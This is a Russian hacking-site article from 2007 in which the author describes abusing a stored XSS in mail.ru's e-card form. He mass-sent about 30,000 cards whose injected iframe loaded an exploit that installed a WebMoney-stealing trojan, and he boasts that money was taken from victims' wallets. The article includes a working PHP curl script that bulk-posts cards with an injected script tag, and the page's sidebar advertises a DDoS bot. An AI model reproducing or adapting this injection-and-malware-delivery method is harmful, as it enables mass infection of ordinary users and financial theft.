Your Ip-Address


IP-адрес:
38.103.63.55

IP-адрес Прокси:
Отсутствует
----
CCBot/1.0 (+http://www.commoncrawl.org/bot.html)


Navigation





Popular files


» Illusion DDoS Bot
» Hijack This 1.99.1
» Smerch v0.4
» Anti-autorun
» Php Vulnerability Analyzer
» John the Ripper
» FreeBSD Руководство пользователя
» Avira AntiVir PersonalEdition Premium


Our friends


Хостинг от hosting.info39.info

Root Soft
Network Terrorism
GraBBerZ.CoM
MadNet
hacker-pro.net
KibeR-ZonA
trinke.net



RSS





Реклама





Поиск по проекту

Документация и статьи » Хакинг

Введите слово для поиска :
Хакинг Грузим сплоит через XSS на mail.ru
Грузим сплоит через XSS на mail.ru

Совсем недавно нашел на mail.ru просто потрясающую активную xss. Дело в том, что не фильтровались поля Текст открытки и Заголовок открытки при быстрой отправке открыток. То есть можно отправлять открытки пользователям с... инжектированным кодом. Естественно, первое, что пришло мне в голову – это зайти на http://asechka.ru/base и взять оттуда все примари mail.ru, и таким образом натырить шестизнаков, подобрав несколько шох мне это очень сильно надоело и я стал думать как еще можно использовать данную уязвимость. Решение пришло очень скоро, на днях я купил wm Трояна и как раз думал что с ним делать. Идея была очень проста, нужно было на сервак поставить сплоит, грузящий wm троя, и в нефильтрованное поле вставить ифрейм, подгружающий сплоит. К тому времени как система была готова я уже собрал небольшую базу мыл юзеров, наверняка имеющих webmoney, их было около 30к. Естественно руками отправлять 30к открыток – не тема и я написал быстренько скриптик для отправки открыток. Выглядел он таким образом:

<?php
set_time_limit(0);
$fp=fopen('ml.txt','r');
$url='http://cards.mail.ru/perl/cards.pl';
while(!feof($fp)) {
$mail=trim(fgets($fp));
$post='name=instsnd_id&action=sendcard&tid=102003&is_fastsend=1&bgcolor=
FFF7E9&senderemail=gugu@mail.ru&rcptemail='.$mail.'&card_head=Поговорим о здоровье!&card_message=<script src="http://ya.ru"></script>';
$curl =curl_init($url);
curl_setopt ($curl, CURLOPT_HEADER, 1);
curl_setopt($curl, CURLOPT_FAILONERROR, 0);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl, CURLOPT_POST,1);
curl_setopt($curl, CURLOPT_POSTFIELDS,$post);
$res =curl_exec ($curl);
curl_close($curl);
echo $mail."<br />";
}
?>



Через пару дней на мой wm кошель уже упали первые деньги, жаль только что mail.ru очень скоро прикрыли эту багу и больше 70% юзеров так и не увидели вольшебную откытку, после открытия которой таинственно пропадали деньги с кошельков. В принципе, данный метод можно использовать не только в случае когда xss активная, можно подкидывать линк и с пассивной xss, но она уже не даст такого результата как в моем случае. Возможно этот способ протроянивания уже далеко не новый, я просто решил поделиться с вами своим личным опытом. writed by dark_gluk || crazy_gluk
Печать Опубликовано : 03 Июль 2007 | Просмотров : 522

Реклама



[Team.denied-root.org] © 2007 - © 2008
All About Hack & Security in Network
Вся информация и программы публикуются на сайте исключитьтельно для ознакомительных целей.
За использование программ в целях, которые противоречат настоящему законодательству РФ, или другого государства, администрация проекта ответсвенности не несёт.